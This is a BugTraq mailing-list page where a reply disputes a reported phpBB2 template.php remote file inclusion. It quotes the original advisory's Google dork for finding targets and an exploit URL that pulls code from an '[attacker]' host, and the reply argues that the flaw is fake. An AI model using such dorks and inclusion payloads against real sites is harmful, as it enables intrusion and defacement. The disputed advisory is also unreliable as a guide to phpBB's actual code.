BugTraq
phpBB2 (template.php) Remote File Inclusion Jun 03 2006 10:47AM
canberx linuxmail org (2 replies)
Re: phpBB2 (template.php) Remote File Inclusion Jun 05 2006 10:14AM
ad (at) heapoverflow (dot) com [email concealed] (ad heapoverflow com) (3 replies)
Re: phpBB2 (template.php) Remote File Inclusion Jun 06 2006 01:47AM
Paul Laudanski (zx castlecops com)
Re: phpBB2 (template.php) Remote File Inclusion Jun 06 2006 12:30AM
Aaron Klein (klein aaron gmail com)
Re: phpBB2 (template.php) Remote File Inclusion Jun 05 2006 09:05PM
Jessica Hope (jessicasaulhope googlemail com)
RE: phpBB2 (template.php) Remote File Inclusion Jun 04 2006 10:08PM
Scrouaf _ (scrouaf hotmail com)
Sounds like a fake to me....
1: template.php is in the /inludes/ subdir
2: it uses no variable $page
3: it does not use the inlude() function at all

What was your aim ? lauching a massive script kiddy attack that wouldn't
work ?

Scrouaf
Desert Warrior and Anargeek

>From: canberx (at) linuxmail (dot) org [email concealed]
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: phpBB2 (template.php) Remote File Inclusion
>Date: 3 Jun 2006 10:47:22 -0000
>MIME-Version: 1.0
>Received: from outgoing.securityfocus.com ([205.206.231.27]) by
>bay0-mc3-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun, 4
>Jun 2006 14:39:48 -0700
>Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
> via smtpd (for bay0-mc3-f.bay0.hotmail.com [65.54.244.72]) with
>ESMTP; Sun, 4 Jun 2006 14:33:09 -0700
>Received: from lists2.securityfocus.com (lists2.securityfocus.com
>[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
>65C202388ED; Sun, 4 Jun 2006 13:04:49 -0600 (MDT)
>Received: (qmail 7295 invoked from network); 3 Jun 2006 10:42:06 -0000
>X-Message-Info: LsUYwwHHNt3GZT6E/6tgNQFelM9zTRGWXiSqkWrZQMA=
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>Return-Path: bugtraq-return-25664-scrouaf=hotmail.com (at) securityfocus (dot) com [email concealed]
>X-OriginalArrivalTime: 04 Jun 2006 21:39:48.0437 (UTC)
>FILETIME=[6741D850:01C6881F]
>
>********************************************************************
>*Title:
>*phpBB2 Remote File Include
>*
>*
>*Credit:
>*Canberx
>*
>*
>*Thanx:
>*Forewer-Partizan
>*
>*
>*Mail:
>*canberx (at) linuxmail (dot) org [email concealed] www.canberx.tk
>*
>*
>*Google Dork:
>*Powered by phpBB © 2001, 2002 phpBB Group
>*
>*
>*Exploit:
>*www.target.com/[path_to_phpbb]/template.php?page=[attacker]
>*
>*
>*********************************************************************
>
>Plz Don't Hacked site if it already has been defaced :)
>
>*********************************************************************

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus